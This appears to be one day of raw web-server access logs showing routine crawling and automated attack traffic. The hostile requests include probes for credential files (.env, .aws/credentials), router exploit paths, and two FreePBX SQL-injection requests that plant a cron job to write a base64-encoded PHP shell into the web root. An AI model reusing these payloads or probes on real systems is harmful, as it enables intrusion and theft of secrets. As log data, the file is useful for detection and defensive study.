167.94.146.51 - - [13/Sep/2025:00:00:16 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.51 - - [13/Sep/2025:00:00:19 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.51 - - [13/Sep/2025:00:00:20 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.146.51 - - [13/Sep/2025:00:00:24 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.146.51 - - [13/Sep/2025:00:00:25 +0200] "GET /login HTTP/1.1" 404 723 45.131.108.166 - - [13/Sep/2025:00:02:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.38.44.221 - - [13/Sep/2025:00:10:41 +0200] "GET /login HTTP/1.1" 404 723 176.65.149.165 - - [13/Sep/2025:00:46:57 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.38.44.221 - - [13/Sep/2025:01:20:56 +0200] "GET /login HTTP/1.1" 404 723 147.185.132.219 - - [13/Sep/2025:01:22:56 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.50 - - [13/Sep/2025:01:31:56 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.50 - - [13/Sep/2025:01:31:59 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.50 - - [13/Sep/2025:01:31:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.50 - - [13/Sep/2025:01:32:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.50 - - [13/Sep/2025:01:32:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 205.185.127.70 - - [13/Sep/2025:01:38:32 +0200] "GET /.env24 HTTP/1.1" 404 724 205.210.31.216 - - [13/Sep/2025:01:48:27 +0200] "GET / HTTP/1.0" 200 1895 213.96.160.0 - - [13/Sep/2025:02:01:20 +0200] "GET / HTTP/1.0" 200 1895 196.251.89.45 - - [13/Sep/2025:02:08:47 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 196.251.81.196 - - [13/Sep/2025:02:17:55 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 205.185.127.70 - - [13/Sep/2025:04:14:55 +0200] "GET /.env23 HTTP/1.1" 404 724 66.132.153.121 - - [13/Sep/2025:04:18:40 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.121 - - [13/Sep/2025:04:18:43 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.121 - - [13/Sep/2025:04:18:43 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.121 - - [13/Sep/2025:04:18:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.121 - - [13/Sep/2025:04:18:47 +0200] "GET /login HTTP/1.1" 404 723 134.122.38.69 - - [13/Sep/2025:04:32:41 +0200] "GET / HTTP/1.1" 200 1895 79.124.49.194 - - [13/Sep/2025:05:08:03 +0200] "-" 400 1930 135.237.123.246 - - [13/Sep/2025:05:19:15 +0200] "-" 400 1930 91.238.181.94 - - [13/Sep/2025:05:52:56 +0200] "-" 400 1930 64.62.197.2 - - [13/Sep/2025:06:09:08 +0200] "-" 400 1930 103.183.216.27 - - [13/Sep/2025:06:31:12 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 205.185.127.70 - - [13/Sep/2025:06:51:28 +0200] "GET /.env17 HTTP/1.1" 404 724 196.251.69.205 - - [13/Sep/2025:08:25:16 +0200] "-" 400 1930 172.234.162.31 - - [13/Sep/2025:08:32:54 +0200] "GET / HTTP/1.0" 200 1895 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET / HTTP/1.1" 200 1895 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET / HTTP/1.1" 200 1895 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET /webui HTTP/1.1" 404 723 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET / HTTP/1.1" 200 1895 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET /owa/ HTTP/1.1" 404 726 172.234.162.31 - - [13/Sep/2025:08:33:00 +0200] "GET /owa/ HTTP/1.1" 404 726 172.234.162.31 - - [13/Sep/2025:08:33:10 +0200] "-" 400 1930 172.234.162.31 - - [13/Sep/2025:08:33:20 +0200] "GET / HTTP/1.0" 200 1895 172.234.162.31 - - [13/Sep/2025:08:33:20 +0200] "GET / HTTP/1.1" 200 1895 170.205.30.232 - - [13/Sep/2025:08:48:33 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 81.171.72.201 - - [13/Sep/2025:09:15:38 +0200] "GET / HTTP/1.1" 200 1895 196.251.84.66 - - [13/Sep/2025:09:27:33 +0200] "GET / HTTP/1.0" 200 1895 54.91.228.77 - - [13/Sep/2025:09:31:09 +0200] "GET / HTTP/1.1" 200 1895 205.185.127.70 - - [13/Sep/2025:09:35:24 +0200] "GET /.env13 HTTP/1.1" 404 724 207.167.67.206 - - [13/Sep/2025:10:19:30 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [13/Sep/2025:10:19:30 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 207.167.67.206 - - [13/Sep/2025:10:19:31 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [13/Sep/2025:10:19:31 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 170.205.30.232 - - [13/Sep/2025:11:50:34 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 205.185.127.70 - - [13/Sep/2025:12:12:58 +0200] "GET /.env12 HTTP/1.1" 404 724 188.72.6.218 - - [13/Sep/2025:12:27:18 +0200] "GET / HTTP/1.1" 200 1895 45.8.133.79 - - [13/Sep/2025:12:33:59 +0200] "GET / HTTP/1.0" 200 1895 207.167.67.206 - - [13/Sep/2025:12:56:47 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [13/Sep/2025:12:56:47 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 207.167.67.206 - - [13/Sep/2025:12:56:47 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [13/Sep/2025:12:56:48 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 66.132.153.63 - - [13/Sep/2025:13:58:28 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.63 - - [13/Sep/2025:13:58:31 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.63 - - [13/Sep/2025:13:58:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.63 - - [13/Sep/2025:13:58:35 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.63 - - [13/Sep/2025:13:58:35 +0200] "GET /login HTTP/1.1" 404 723 170.205.30.232 - - [13/Sep/2025:14:28:29 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 104.248.205.114 - - [13/Sep/2025:14:31:43 +0200] "-" 400 1930 104.248.205.114 - - [13/Sep/2025:14:31:43 +0200] "-" 400 1930 104.248.205.114 - - [13/Sep/2025:14:31:43 +0200] "GET / HTTP/1.1" 200 1895 104.248.205.114 - - [13/Sep/2025:14:31:43 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 104.248.205.114 - - [13/Sep/2025:14:31:43 +0200] "GET /get.php HTTP/1.1" 404 725 64.62.156.10 - - [13/Sep/2025:14:37:24 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.17 - - [13/Sep/2025:14:37:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.13 - - [13/Sep/2025:14:38:02 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.17 - - [13/Sep/2025:14:38:16 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.156.10 - - [13/Sep/2025:14:38:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 205.185.127.70 - - [13/Sep/2025:14:50:18 +0200] "GET /.env11 HTTP/1.1" 404 724 45.95.147.173 - - [13/Sep/2025:14:51:33 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 141.98.82.26 - - [13/Sep/2025:14:56:58 +0200] "POST /%77eb%75i_%77sma_Http HTTP/1.1" 404 739 141.98.82.26 - - [13/Sep/2025:14:56:58 +0200] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 404 745 196.251.73.152 - - [13/Sep/2025:15:08:43 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:48 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "GET /.env HTTP/1.1" 404 722 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "GET /.env.dev HTTP/1.1" 404 726 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "GET /.env.prod HTTP/1.1" 404 727 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:49 +0200] "GET /.aws/config HTTP/1.1" 404 733 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "GET /.aws/credentials HTTP/1.1" 404 738 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "GET /sendgrid.env HTTP/1.1" 404 730 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "GET /?pp=env HTTP/1.1" 200 1895 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:50 +0200] "GET /config.json HTTP/1.1" 404 729 196.251.73.152 - - [13/Sep/2025:15:08:51 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:51 +0200] "GET /docker-compose.yml HTTP/1.1" 404 736 196.251.73.152 - - [13/Sep/2025:15:08:51 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:51 +0200] "GET /_debugbar/open?max=20&offset=0 HTTP/1.1" 404 736 196.251.73.152 - - [13/Sep/2025:15:08:51 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:52 +0200] "GET /debug/vars HTTP/1.1" 404 732 196.251.73.152 - - [13/Sep/2025:15:08:52 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:52 +0200] "GET /app_dev.php/?open=file=app/config/parameters.yml HTTP/1.1" 404 734 196.251.73.152 - - [13/Sep/2025:15:08:52 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:52 +0200] "GET /application/configs/application.ini HTTP/1.1" 404 761 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "GET /app/config/parameters.yml HTTP/1.1" 404 751 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "GET /appsettings.json HTTP/1.1" 404 734 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "GET /cgi-bin/printenv.pl HTTP/1.1" 404 741 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "HEAD / HTTP/1.0" 200 - 196.251.73.152 - - [13/Sep/2025:15:08:53 +0200] "GET /wp-config.php.backup HTTP/1.1" 404 738 45.38.44.221 - - [13/Sep/2025:15:41:56 +0200] "GET /login HTTP/1.1" 404 723 80.75.212.17 - - [13/Sep/2025:15:51:58 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 400 804 194.165.16.11 - - [13/Sep/2025:16:14:49 +0200] "GET /api/v1.0/web/retained-data HTTP/1.1" 404 756 196.251.87.74 - - [13/Sep/2025:16:54:52 +0200] "-" 400 1930 205.185.127.70 - - [13/Sep/2025:17:29:22 +0200] "GET /.env10 HTTP/1.1" 404 724 3.134.148.59 - - [13/Sep/2025:17:32:59 +0200] "GET / HTTP/1.1" 200 1895 170.205.30.232 - - [13/Sep/2025:17:34:38 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 3.134.148.59 - - [13/Sep/2025:17:35:08 +0200] "-" 400 1930 3.134.148.59 - - [13/Sep/2025:17:37:38 +0200] "-" 400 1930 3.134.148.59 - - [13/Sep/2025:17:39:52 +0200] "-" 400 1930 160.191.243.178 - - [13/Sep/2025:17:40:33 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 92.42.201.26 - - [13/Sep/2025:17:46:33 +0200] "GET /json/ HTTP/1.1" 404 727 92.42.201.26 - - [13/Sep/2025:17:46:33 +0200] "-" 400 1930 92.42.201.26 - - [13/Sep/2025:17:46:33 +0200] "-" 400 1930 24.199.98.33 - - [13/Sep/2025:17:50:48 +0200] "GET /aaa9 HTTP/1.1" 404 722 24.199.98.33 - - [13/Sep/2025:17:50:50 +0200] "GET /aab8 HTTP/1.1" 404 722 24.199.98.33 - - [13/Sep/2025:17:50:53 +0200] "GET / HTTP/1.1" 200 1895 170.205.30.232 - - [13/Sep/2025:18:08:53 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.38.44.221 - - [13/Sep/2025:18:28:52 +0200] "GET /login HTTP/1.1" 404 723 123.172.81.114 - - [13/Sep/2025:18:38:01 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 123.172.81.114 - - [13/Sep/2025:18:38:01 +0200] "-" 400 1930 194.165.16.11 - - [13/Sep/2025:19:51:58 +0200] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+ HTTP/1.1" 404 736 194.165.16.11 - - [13/Sep/2025:19:51:58 +0200] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'%20;INSERT%20INTO%20cron_jobs%20(modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)%20VALUES%20('sysadmin','myivba','echo%20%22PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo=%22%7Cbase64%20-d%20%3E/var/www/html/wzcqs.php',NULL,'*%20*%20*%20*%20*',30,1,1)%20--%20 HTTP/1.1" 404 736 196.251.86.125 - - [13/Sep/2025:20:04:20 +0200] "GET /login HTTP/1.1" 404 723 185.91.127.107 - - [13/Sep/2025:20:06:00 +0200] "-" 400 1930 205.185.127.70 - - [13/Sep/2025:20:07:29 +0200] "GET /.env1 HTTP/1.1" 404 723 185.170.144.3 - - [13/Sep/2025:21:16:52 +0200] "-" 400 1930 196.251.89.45 - - [13/Sep/2025:21:25:01 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [13/Sep/2025:21:25:29 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [13/Sep/2025:21:25:30 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 157.245.152.217 - - [13/Sep/2025:21:33:06 +0200] "-" 400 1930 157.245.152.217 - - [13/Sep/2025:21:33:06 +0200] "GET /cdn-cgi/trace HTTP/1.1" 404 735 172.236.228.218 - - [13/Sep/2025:21:40:39 +0200] "-" 400 1930 172.236.228.218 - - [13/Sep/2025:21:40:39 +0200] "-" 400 1930 45.38.44.221 - - [13/Sep/2025:22:39:36 +0200] "GET /login HTTP/1.1" 404 723 40.124.175.60 - - [13/Sep/2025:23:01:59 +0200] "GET / HTTP/1.1" 200 1895 18.97.26.105 - - [13/Sep/2025:23:54:01 +0200] "GET / HTTP/1.1" 200 1895